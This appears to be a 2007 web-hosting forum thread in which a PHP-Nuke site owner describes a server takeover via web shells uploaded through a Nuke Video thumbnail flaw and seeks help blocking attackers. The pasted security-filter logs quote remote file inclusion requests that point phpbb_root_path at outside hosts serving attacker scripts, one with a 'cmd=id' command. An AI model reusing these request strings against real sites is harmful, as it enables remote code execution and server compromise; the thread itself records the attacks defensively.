Nuke Video 2.4 has a new patch

New Member Joined: Jun 12, 2007 Posts: 2

My site and one of our servers got taken over via a code issue allowing php files to be uploaded via thumbnail upload with a submitted video.

This was fixed the same day by the admin at Nuke Video once i reported and gave logs, but i figured i would post here so if anyone is using the script they know to grab the patch.

They uploaded a couple of files one main one that gave them access to the Server and all root / users passwords for the server along with database access etc.

36_rachid.php

.r57shell.php

The server is now back in our control and has been formated and reloaded complete and all new security added to the phpnuke website.

What i dont understand is why Sentinal didnt block them i had set all IP address from Russian and morrocian to be blocked and the ip address found in the httpd_access_log file in the server are from within the ranges i blocked.

I added this to my httaccess file also

RedirectMatch r57shell.php http://www.mydomain.com
RedirectMatch rachid.php http://www.mydomain.com

Can anyone tell me how to block a whole country?

Im really over being hacked and the attempts so i wish to just block all IP's from RU

I recieve many emails ever day saying blocked someone from an ip in RU and they all seem to include this:

Date & Time: 2007-06-26 20:26:26 EST GMT +1000 Blocked IP: 216.117.141.102 User ID: Visitor (1)
Reason: Abuse-Filter
--------------------
User Agent: libwww-perl/5.65
Query String: www.mydomain.com.au/modules/Forums/admin/admin_styles.php?phpbb_root_path=http://80.201.236.78/~pat/evilx?
Get String: www.mydomain.com.au/modules/Forums/admin/admin_styles.php?phpbb_root_path=http://80.201.236.78/~pat/evilx?
Post String: www.mydomain.com.au/modules/Forums/admin/admin_styles.php
Forwarded For: none
Client IP: none
Remote Address: 216.117.141.102
Remote Port: 55123
Request Method: GET

Or

Date & Time: 2007-06-27 04:54:44 EST GMT +1000 Blocked IP: 85.98.179.220 User ID: Anonymous (1)
Reason: Abuse-Filter
--------------------
User Agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.0) Query String: www.mydomain.com/modules/Forums/admin/admin_styles.php?phpbb_root_path=http://englishforbusinessonline.com/tool20.dat?&list=1&cmd=id
Get String: www.mydomain.com/modules/Forums/admin/admin_styles.php?phpbb_root_path=http://englishforbusinessonline.com/tool20.dat?&list=1&cmd=id
Post String: www.mydomain.com/modules/Forums/admin/admin_styles.php
Forwarded For: none
Client IP: none
Remote Address: 85.98.179.220
Remote Port: 4873
Request Method: GET

Cheers
KillerSkippy

registered · Posted: Tue Jun 26, 2007 8:43 pm

Did Sentinel write any of the Russian IP ranges to the banned list in .htaccess ?

You can block all the libwww-perl attacks using .htaccess - its referenced in a previous thread before. I've seen usage of Mozilla/4.0 before, but I am unaware whether this is truly an automated bot or just a bad hacker.

Posted: Tue Jun 26, 2007 8:53 pm

evaders99 wrote:

Did Sentinel write any of the Russian IP ranges to the banned list in .htaccess ?

You can block all the libwww-perl attacks using .htaccess - its referenced in a previous thread before. I've seen usage of Mozilla/4.0 before, but I am unaware whether this is truly an automated bot or just a bad hacker.

Yes the IP address's are added auto to the htaccess file but the range is already set to block in the block range section of sentinal, so they shouldnt be getting to the site in the first place unless im not understanding how it works.

I am searching for the libwww-perl attacks now i hope that helps